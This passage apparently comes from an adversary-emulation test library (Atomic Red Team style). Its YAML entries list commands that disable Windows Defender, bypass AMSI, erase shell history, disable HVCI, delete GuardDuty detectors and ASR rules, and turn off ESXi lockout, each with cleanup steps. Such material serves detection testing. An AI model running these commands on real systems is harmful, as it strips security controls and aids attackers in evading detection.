reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
auto_generated_guid: d8c57eaa-497a-4a08-961e-bd5efd7c9374
description: 'LockBit Black - Disable Privacy Settings Experience Using Registry
'
supported_platforms:
- windows
executor:
command: 'New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE"
-Name DisablePrivacyExperience -PropertyType DWord -Value 1 -Force
'
cleanup_command: 'Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE"
-Name DisablePrivacyExperience -Force -ErrorAction Ignore
'
name: powershell
elevation_required: true
- name: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
auto_generated_guid: 5e27f36d-5132-4537-b43b-413b0d5eec9a
description: 'Lockbit Black - Use Registry Editor to turn on automatic logon
'
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Value password1 -Force
cleanup_command: |
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
auto_generated_guid: f542ffd3-37b4-4528-837f-682874faa012
description: "The following Atomic will attempt to disable Windows-Defender
using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment
Image Servicing and Management tool. \nSimilar to DISM.exe, this cmdlet is
used to enumerate, install, uninstall, configure, and update features and
packages in Windows images.\nA successful execution will not standard-out
any details. Remove the quiet switch if verbosity is needed.\nThis method
will remove Defender and it's packages.\nReference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps\n"
supported_platforms:
- windows
executor:
command: |-
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
name: powershell
elevation_required: true
- name: WMIC Tamper with Windows Defender Evade Scanning Folder
auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
description: |
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
supported_platforms:
- windows
executor:
command: 'wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference
call Add ExclusionPath=\"ATOMICREDTEAM\"
'
cleanup_command: 'wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class
MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
'
name: command_prompt
elevation_required: true
- name: Delete Windows Defender Scheduled Tasks
auto_generated_guid: 4b841aa1-0d05-4b32-bbe7-7564346e7c76
description: |
The following atomic test will delete the Windows Defender scheduled tasks.
[Reference](https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/)
supported_platforms:
- windows
dependencies:
- description: 'The Windows Defender scheduled tasks must be backed up first
'
prereq_command: 'IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT
0 ) ELSE ( EXIT 1 )
'
get_prereq_command: |
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"
executor:
command: |
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f )
IF EXIST "%temp%\Windows_Defender_Cleanup.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f )
IF EXIST "%temp%\Windows_Defender_Verification.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f )
IF EXIST "%temp%\Windows_Defender_Cache_Maintenance.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f )
cleanup_command: |
schtasks /create /xml "%temp%\Windows_Defender_Scheduled_Scan.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /create /xml "%temp%\Windows_Defender_Cleanup.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /create /xml "%temp%\Windows_Defender_Verification.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
name: command_prompt
elevation_required: true
- name: Clear History
auto_generated_guid: 23b88394-091b-4968-a42d-fb8076992443
description: "Clear Shell History. This technique only affect the bash shell
application. \n"
supported_platforms:
- linux
executor:
command: 'history -c
'
name: sh
elevation_required: true
- name: Suspend History
auto_generated_guid: 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4
description: 'suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
'
supported_platforms:
- linux
executor:
command: 'set +o history
'
cleanup_command: 'set -o history
'
name: sh
elevation_required: true
- name: Reboot Linux Host via Kernel System Request
auto_generated_guid: 6d6d3154-1a52-4d1a-9d51-92ab8148b32e
description: 'reboot system via system request seen in Awfulshred wiper.
'
supported_platforms:
- linux
executor:
command: "echo 1> /proc/sys/kernel/sysrq \necho b> /proc/sysrq-trigger \n"
name: sh
elevation_required: true
- name: Clear Pagging Cache
auto_generated_guid: f790927b-ea85-4a16-b7b2-7eb44176a510
description: |
clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part
of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
supported_platforms:
- linux
executor:
command: "free && echo 3 > /proc/sys/vm/drop_caches && free\necho 3> /proc/sys/vm/drop_caches
\n"
name: sh
elevation_required: true
- name: Disable Memory Swap
auto_generated_guid: e74e4c63-6fde-4ad2-9ee8-21c3a1733114
description: "disable swapping of device paging that impaire the compromised
host to swap data if the RAM is full. Awfulshred wiper used this technique
as an additional \npayload to the compromised host and to make sure that there
will be no recoverable data due to swap feature of FreeBSD/linux.\n"
supported_platforms:
- linux
executor:
command: "swapon -a \nsleep 2\nswapoff -a\nsync\n"
cleanup_command: |
swapon -a
sleep 2
sync
name: sh
elevation_required: true
- name: Disable Hypervisor-Enforced Code Integrity (HVCI)
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
description: "This test disables Hypervisor-Enforced Code Integrity (HVCI) by
setting the registry key HKLM:\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity
\"Enabled\" value to \"0\".\nThe pre-req needs to be ran in order to setup
HVCI and have it enabled. \nWe do not recommend running this in production.\n[Black
Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)\n[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)\n"
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'HVCI must be enabled
'
prereq_command: 'if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
/v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
/v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
/v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
/v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
/v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1
}
'
get_prereq_command: |
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
executor:
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
/v "Enabled" /t REG_DWORD /d 0 /f
'
cleanup_command: |
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
name: powershell
elevation_required: true
- name: AMSI Bypass - Override AMSI via COM
auto_generated_guid: 17538258-5699-4ff1-92d1-5ac9b0dc21f5
description: "With administrative rights, an adversary can disable AMSI via
registry value in HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}
by overriding the Microsoft Defender COM object for AMSI and points it to
a DLL that does not exist.\nThis is currently being used by AsyncRAT and others.
\nhttps://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html\nhttps://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/\n"
supported_platforms:
- windows
executor:
command: 'REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
/ve /t REG_SZ /d C:\IDontExist.dll /f
'
cleanup_command: 'REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32
/f
'
name: command_prompt
elevation_required: true
- name: AWS - GuardDuty Suspension or Deletion
auto_generated_guid: 11e65d8d-e7e4-470e-a3ff-82bc56ad938e
description: 'Enables GuardDuty in AWS, upon successful creation this test will
suspend and then delete the GuardDuty configuration.
'
supported_platforms:
- iaas:aws
input_arguments:
region:
description: Name of the specified region
type: string
default: us-east-1
dependency_executor_name: bash
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
default profile using: aws configure"
'
executor:
command: |
detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
aws guardduty update-detector --no-enable --detector-id $detectorId
aws guardduty delete-detector --detector-id $detectorId
cleanup_command: 'echo "If test successfully ran, no cleanup required."
'
name: bash
elevation_required: false
- name: Tamper with Defender ATP on Linux/MacOS
auto_generated_guid: 40074085-dbc8-492b-90a3-11bcfc52fda8
description: 'With root privileges, an adversary can disable real time protection.
Note, this test assumes Defender is not in passive mode and real-time protection
is enabled. The use of a managed.json on Linux or Defender .plist on MacOS
will prevent these changes. Tamper protection will also prevent this (available
on MacOS, but not Linux at the time of writing). Installation of MDATP is
a prerequisite. Installation steps vary across MacOS and Linux distros. See
Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide
https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
'
supported_platforms:
- linux
- macos
executor:
command: 'sudo mdatp config real-time-protection --value disabled
'
cleanup_command: 'sudo mdatp config real-time-protection --value enabled
'
name: sh
elevation_required: true
- name: Tamper with Windows Defender Registry - Reg.exe
auto_generated_guid: 1f6743da-6ecc-4a93-b03f-dc357e4b313f
description: 'Disable Windows Defender by tampering with windows defender registry
using the utility "reg.exe"
'
supported_platforms:
- windows
executor:
command: "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\"
/v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableIntrusionPreventionSystem\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableScriptScanning\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v
\"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f >NUL 2>nul \nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v
\"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add
\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\"
/t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App
and Browser protection\" /v \"DisallowExploitProtectionOverride\" /t REG_DWORD
/d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
/v \"TamperProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\software\\microsoft\\windows
defender\\spynet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f
>NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\" /v \"PUAProtection\"
/t REG_DWORD /d \"0\" /f >NUL 2>nul\n"
cleanup_command: "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\"
/v \"DisableAntiSpyware\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableIntrusionPreventionSystem\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableIOAVProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableOnAccessProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
/v \"DisableScriptScanning\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v
\"DisableEnhancedNotifications\" /t REG_DWORD /d \"0\" /f >NUL 2>nul \nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v
\"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add
\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\"
/t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows
Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg
add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender Security Center\\App
and Browser protection\" /v \"DisallowExploitProtectionOverride\" /t REG_DWORD
/d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\\Features\"
/v \"TamperProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\software\\microsoft\\windows
defender\\spynet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"1\" /f
>NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\" /v \"PUAProtection\"
/t REG_DWORD /d \"1\" /f >NUL 2>nul\n"
name: command_prompt
elevation_required: true
- name: Tamper with Windows Defender Registry - Powershell
auto_generated_guid: a72cfef8-d252-48b3-b292-635d332625c3
description: 'Disable Windows Defender by tampering with windows defender registry
through powershell
'
supported_platforms:
- windows
executor:
command: "Set-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\" -Name \"DisableAntiSpyware\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\" -Name \"DisableAntiVirus\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\Real-Time Protection\" -Name \"DisableBehaviorMonitoring\" -Value
1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
Protection\" -Name \"DisableIntrusionPreventionSystem\" -Value 1 \nSet-ItemProperty
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
-Name \"DisableIOAVProtection\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\Real-Time Protection\" -Name \"DisableOnAccessProtection\" -Value
1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
Protection\" -Name \"DisableRealtimeMonitoring\" -Value 1 \nSet-ItemProperty
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
-Name \"DisableRoutinelyTakingAction\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\Real-Time Protection\" -Name \"DisableScanOnRealtimeEnable\" -Value
1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
Protection\" -Name \"DisableScriptScanning\" -Value 1 \nSet-ItemProperty
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" -Name
\"DisableEnhancedNotifications\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\SpyNet\" -Name \"DisableBlockAtFirstSeen\" -Value 1 \nSet-ItemProperty
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name
\"SpynetReporting\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\MpEngine\" -Name \"MpEnablePus\" -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows
Defender Security Center\\App and Browser protection\" -Name \"DisallowExploitProtectionOverride\"
-Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
-Name \"TamperProtection\" -Value 0 \nSet-ItemProperty \"HKLM:\\software\\microsoft\\windows
defender\\spynet\" -Name \"SubmitSamplesConsent\" -Value 0 \nSet-ItemProperty
\"HKLM:\\Software\\Microsoft\\Windows Defender\" -Name \"PUAProtection\"
-Value 0 \n"
cleanup_command: "Set-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\" -Name \"DisableAntiSpyware\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\" -Name \"DisableAntiVirus\" -Value 0\nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\Real-Time Protection\" -Name \"DisableBehaviorMonitoring\" -Value
0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
Protection\" -Name \"DisableIntrusionPreventionSystem\" -Value 0\nSet-ItemProperty
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
-Name \"DisableIOAVProtection\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\Real-Time Protection\" -Name \"DisableOnAccessProtection\" -Value
0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
Protection\" -Name \"DisableRealtimeMonitoring\" -Value 0 \nSet-ItemProperty
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\"
-Name \"DisableRoutinelyTakingAction\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\Real-Time Protection\" -Name \"DisableScanOnRealtimeEnable\" -Value
0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time
Protection\" -Name \"DisableScriptScanning\" -Value 0 \nSet-ItemProperty
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" -Name
\"DisableEnhancedNotifications\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\SpyNet\" -Name \"DisableBlockAtFirstSeen\" -Value 0\nSet-ItemProperty
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name
\"SpynetReporting\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows
Defender\\MpEngine\" -Name \"MpEnablePus\" -Value 1 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows
Defender Security Center\\App and Browser protection\" -Name \"DisallowExploitProtectionOverride\"
-Value 1 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Features\"
-Name \"TamperProtection\" -Value 1\nSet-ItemProperty \"HKLM:\\software\\microsoft\\windows
defender\\spynet\" -Name \"SubmitSamplesConsent\" -Value 1 \nSet-ItemProperty
\"HKLM:\\Software\\Microsoft\\Windows Defender\" -Name \"PUAProtection\"
-Value 1 \n"
name: powershell
elevation_required: true
- name: ESXi - Disable Account Lockout Policy via PowerCLI
auto_generated_guid: '091a6290-cd29-41cb-81ea-b12f133c66cb'
description: 'An adversary may disable account lockout policy within ESXi to
have the ability to prevent defensive actions from being enforced in the future
or to prevent future alerting.
'
supported_platforms:
- linux
input_arguments:
vm_host:
description: Specify the host name of the ESXi Server
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on ESXi Server
type: string
default: root
vm_pass:
description: Specify the privilege user password on ESXi Server
type: string
default: pass
dependency_executor_name: powershell
dependencies:
- description: 'Check if VMWARE PowerCLI PowerShell Module is installed.
'
prereq_command: |
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
get_prereq_command: 'Install-Module -Name VMware.PowerCLI -Confirm:$false
'
executor:
command: "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false
-Confirm:$false \nConnect-VIServer -Server #{vm_host} -User #{vm_user} -Password
#{vm_pass}\nGet-AdvancedSetting -Entity #{vm_host} -Name 'Security.AccountLockFailures'
| Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n"
name: powershell
elevation_required: true
- name: Delete Microsoft Defender ASR Rules - InTune
auto_generated_guid: eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
description: This test simulates the deletion of the ASR rules loaded by Microsoft
Defender using the registry. Depending on the deployment, rules can be pushed
either using GPO or InTune, This test simulates an InTune-based rules deployment.
supported_platforms:
- windows
executor:
command: |-
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager"
if (-not (Test-Path $registryPath)) {
New-Item -Path $registryPath -Force
Write-Host "Registry key created: $registryPath"
}
$registryValueName = "ASRRules"
if (Test-Path "$registryPath\$registryValueName") {
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
} else {
New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value "36190899-1602-49e8-8b27-eb1d0a1ce869=1" -Force
Write-Host "Registry value created: $registryValueName"
}
Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"
name: powershell
elevation_required: true
- name: Delete Microsoft Defender ASR Rules - GPO
auto_generated_guid: 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
description: This test simulates the deletion of the ASR rules loaded by Microsoft
Defender using the registry. Depending on the deployment, rules can be pushed
either using GPO or InTune, This test simulates a GPO-based rules deployment.
supported_platforms:
- windows
executor:
command: |-
$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"
if (-not (Test-Path $registryPath)) {
New-Item -Path $registryPath -Force
Write-Host "Registry key created: $registryPath"
}
$newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
$newValueData = "1"
New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
Write-Host "Registry value created: $newValueName with data $newValueData"
